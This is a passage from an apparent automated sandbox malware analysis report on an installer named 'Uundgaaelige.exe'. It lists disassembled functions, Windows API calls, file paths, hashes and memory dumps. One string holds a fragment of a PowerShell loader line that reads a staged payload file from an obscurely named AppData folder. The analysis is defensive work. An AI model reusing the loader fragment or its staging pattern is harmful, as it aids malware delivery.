                                                  • Opcode ID: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
                                                  • Instruction ID: bd711969ba89efe8629f231cafa01baa053f2358784498ab8b3cf30639ef5a41
                                                  • Opcode Fuzzy Hash: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
                                                  • Instruction Fuzzy Hash: 55A012320000009FCB014B50EF04C057F71AB543007018435E140400338A310821FF0C
                                                  Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: b75fb29a01c04beb4e0ac4da96e0bcabae8c51172b298c90322b8e940640e135
                                                  • Instruction ID: 570e0916f0090f26c7ee0a6088be2661e77b817c4cb0ee023996dcc8b23dd1f7
                                                  • Opcode Fuzzy Hash: b75fb29a01c04beb4e0ac4da96e0bcabae8c51172b298c90322b8e940640e135
                                                  • Instruction Fuzzy Hash: 96D05E73B141518BD754EBB9BA8845E73E4EB903153214837E852E2091EA78C8424A28

                                                  Non-executed Functions

                                                  Function 00404B3D Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B55
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B60
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BAA
                                                  • LoadBitmapA.USER32(0000006E), ref: 00404BBD
                                                  • SetWindowLongA.USER32(?,000000FC,00405134), ref: 00404BD6
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BEA
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BFC
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404C12
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C1E
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C30
                                                  • DeleteObject.GDI32(00000000), ref: 00404C33
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C5E
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C6A
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404CFF
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404D2A
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D3E
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404D6D
                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404D7B
                                                  • ShowWindow.USER32(?,00000005), ref: 00404D8C
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404E89
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404EEE
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F03
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F27
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F47
                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00404F5C
                                                  • GlobalFree.KERNEL32(00000000), ref: 00404F6C
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404FE5
                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 0040508E
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040509D
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004050BD
                                                  • ShowWindow.USER32(?,00000000), ref: 0040510B
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405116
                                                  • ShowWindow.USER32(00000000), ref: 0040511D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N$l8h
                                                  • API String ID: 1638840714-2106396844
                                                  • Opcode ID: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
                                                  • Instruction ID: d82d2da19de6c08df5f7af85b096481c441aefc445292f149536e1611d4f21ae
                                                  • Opcode Fuzzy Hash: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
                                                  • Instruction Fuzzy Hash: 080241B0A00209AFDB209F95DD85AAE7BB5FB84314F10417AF611BA2E1C7799D42CF58
                                                  Function 004045CA Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 274stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404643
                                                  • SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 004046F4
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                  • lstrcmpiA.KERNEL32(: Completed,shaharit Setup: Completed), ref: 00404731
                                                  • lstrcatA.KERNEL32(?,: Completed), ref: 0040473D
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040474F
                                                    • Part of subcall function 00405799: GetDlgItemTextA.USER32(?,?,00000400,00404786), ref: 004057AC
                                                    • Part of subcall function 00406303: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Uundgaaelige.exe",77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                                                    • Part of subcall function 00406303: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                                                    • Part of subcall function 00406303: CharNextA.USER32(?,"C:\Users\user\Desktop\Uundgaaelige.exe",77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                                                    • Part of subcall function 00406303: CharPrevA.USER32(?,?,77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                                                  • GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 0040480D
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404828
                                                    • Part of subcall function 00404981: lstrlenA.KERNEL32(shaharit Setup: Completed,shaharit Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                                                    • Part of subcall function 00404981: wsprintfA.USER32 ref: 00404A27
                                                    • Part of subcall function 00404981: SetDlgItemTextA.USER32(?,shaharit Setup: Completed), ref: 00404A3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt$: Completed$A$C:\Users\user\AppData\Roaming\raffineredes\cerous$l8h$shaharit Setup: Completed
                                                  • API String ID: 2624150263-3080919986
                                                  • Opcode ID: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
                                                  • Instruction ID: 615b1c7bc5a39f2962dd47e2389a1e1cc3dfb76fea7d39b1cb42eedec06edaaa
                                                  • Opcode Fuzzy Hash: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
                                                  • Instruction Fuzzy Hash: E4A19FB1900209ABDB11EFA5CC85AAFB7B8EF85314F10843BF611B62D1D77C89418B69
                                                  Function 004020CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoCreateInstance.OLE32(00408408,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne, xrefs: 0040218D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne
                                                  • API String ID: 123533781-3937776109
                                                  • Opcode ID: 6635f594b61ce934d192a6d41804f9d6b5f4078cf2f1b58ccc5d727e59ea5b13
                                                  • Instruction ID: a4a7f3c5621d46c7608b395b9069b641d7403675325c7ae40bb0e4cab6624151
                                                  • Opcode Fuzzy Hash: 6635f594b61ce934d192a6d41804f9d6b5f4078cf2f1b58ccc5d727e59ea5b13
                                                  • Instruction Fuzzy Hash: 89512475A00208BFCF10DFE4C988A9DBBB5EF88314F2045AAF915EB2D1DA799941CF54
                                                  Function 004026F8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 6e256eea41c4bf556cba901839b7f4fb64acae9e66e34b9222a974add78538a2
                                                  • Instruction ID: 0159b05a81fb7445ac67952f267e1ed3d95360429fb03f1bd53dceef05a54f2a
                                                  • Opcode Fuzzy Hash: 6e256eea41c4bf556cba901839b7f4fb64acae9e66e34b9222a974add78538a2
                                                  • Instruction Fuzzy Hash: EEF055727041019BC300EBB49948AEEB768DF21324F20017FE285F20C1C7B889469B3A
                                                  Function 004042A3 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 202windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040432E
                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404342
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404360
                                                  • GetSysColor.USER32(?), ref: 00404371
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404380
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040438F
                                                  • lstrlenA.KERNEL32(?), ref: 00404392
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043A1
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043B6
                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404418
                                                  • SendMessageA.USER32(00000000), ref: 0040441B
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404446
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404486
                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00404495
                                                  • SetCursor.USER32(00000000), ref: 0040449E
                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004044B4
                                                  • SetCursor.USER32(00000000), ref: 004044B7
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004044E3
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004044F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: : Completed$N$l8h$nB@
                                                  • API String ID: 3103080414-3676058858
                                                  • Opcode ID: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                                                  • Instruction ID: d5db58c66581f694922deb7e8fae8f0f3f349f8e9ef4465256bb12a48e84c332
                                                  • Opcode Fuzzy Hash: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                                                  • Instruction Fuzzy Hash: 0E61A4B1A40209BFDB109F61DD45F6A7B69FB84714F10803AFB05BA2D1C7B8A951CF98
                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                  • Instruction ID: efe066deb40a78245321151b9dab29af26a41e73ee4a669cec0cc25ab5e9cd35
                                                  • Opcode Fuzzy Hash: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                  • Instruction Fuzzy Hash: 89418C71800209AFCF058F95DE459AFBBB9FF45315F00802EF5A1AA1A0CB389A55DFA4
                                                  Function 00405D08 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405E99,?,?), ref: 00405D39
                                                  • GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405D42
                                                    • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                                                    • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                                                  • GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405D5F
                                                  • wsprintfA.USER32 ref: 00405D7D
                                                  • GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405DB8
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405DC7
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DFF
                                                  • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405E55
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405E66
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405E6D
                                                    • Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00405C36
                                                    • Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2171350718-1727408572
                                                  • Opcode ID: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
                                                  • Instruction ID: d3b28aaf25f2f1dce52cf372ecf52c774524a9466fe584fbe8e796e5af075e1b
                                                  • Opcode Fuzzy Hash: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
                                                  • Instruction Fuzzy Hash: 97312331200B19BBC2206B61EE49F2B3A5CDF85754F14043AF985F62D2DB7CA9018ABD
                                                  Function 00406303 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Uundgaaelige.exe",77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                                                  • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\Uundgaaelige.exe",77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                                                  • CharPrevA.USER32(?,?,77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                                                  Strings
                                                  • *?|<>/":, xrefs: 0040634B
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406304
                                                  • "C:\Users\user\Desktop\Uundgaaelige.exe", xrefs: 0040633F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\Uundgaaelige.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-2722285368
                                                  • Opcode ID: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
                                                  • Instruction ID: aaadfa82e77317605f3281ec64e2e7980eb4a55dd70e9bd95d11bcdf30b36afc
                                                  • Opcode Fuzzy Hash: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
                                                  • Instruction Fuzzy Hash: 6011826180479129EB3216384C44BBBAFD84B57760F5A407FEDC6722C2D67C6C6286AD
